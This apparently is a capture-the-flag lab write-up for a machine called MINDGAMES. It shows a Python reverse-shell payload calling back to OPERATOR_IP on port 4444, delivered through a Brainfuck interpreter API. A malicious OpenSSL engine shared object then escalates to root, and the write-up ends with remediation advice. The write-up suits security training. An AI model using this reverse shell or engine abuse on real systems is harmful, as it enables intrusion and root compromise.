Case file

Brainfuck API RCE and OpenSSL engine shared-object root

Intermediate Linux engagement: /api/bf executed Brainfuck that spawned a reverse shell; a root systemd unit invoked openssl with a loadable engine — a malicious .so completed privilege escalation.

Intermediate26 minLinux · RCE · Brainfuck · Privilege Escalation
01

Engagement summary

HTTP exposed a Brainfuck interpreter API. Encoded Python reverse shell via POST /api/bf; openssl engine abuse under a privileged service yielded root.

MINDGAMES exposed a web UI and POST /api/bf that interpreted Brainfuck and ran the resulting side effects on the host. We encoded a Python reverse shell into BF, posted it, and caught a shell as the service user. Enumeration of server.service showed root invoking openssl with a custom engine path. Compiling a shared object that spawned a shell on engine load, then running openssl req -engine ./rootshell.so, returned root.

Business impact

Unsandboxed language interpreters on the internet are remote code execution. Privileged processes that load attacker-writable OpenSSL engines are root. Remove BF/eval endpoints from production; run crypto helpers without custom engines or with root-owned engine directories only.

02

Brainfuck API to reverse shell

POST /api/bf executed encoded Python that connected back to the operator listener.

PAYLOAD · PYTHON

rev.py

import socket, subprocess, os
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("OPERATOR_IP", 4444))
os.dup2(s.fileno(), 0)
os.dup2(s.fileno(), 1)
os.dup2(s.fileno(), 2)
subprocess.call(["/bin/bash", "-i"])

OPERATOR · BF API

savvy@lab:~$ nmap -sC -sV 10.10.10.50

80/tcp open http

savvy@lab:~$ curl -s http://10.10.10.50/

# UI references /api/bf Brainfuck interpreter

savvy@lab:~$ nc -lnvp 4444

savvy@lab:~$ curl -d "<brainfuck_encoded_revshell>" -X POST http://10.10.10.50/api/bf

savvy@lab:~$

03

OpenSSL engine shared object to root

Malicious engine .so loaded by openssl under the root service spawned a root shell.

OPERATOR · ROOT

savvy@lab:~$ cat /etc/systemd/system/server.service

# root ExecStart invokes openssl with -engine

savvy@lab:~$ gcc -fPIC -o rootshell.o -c rootshell.c && gcc -shared -o rootshell.so -lcrypto rootshell.o

savvy@lab:~$ chmod +x rootshell.so && openssl req -engine ./rootshell.so

root@lab:~# id

uid=0(root) gid=0(root) groups=0(root)

Remediation

Delete interpreter APIs or run them in disposable containers with no egress. Pin OpenSSL engines to immutable paths; never load .so from world-writable directories as root.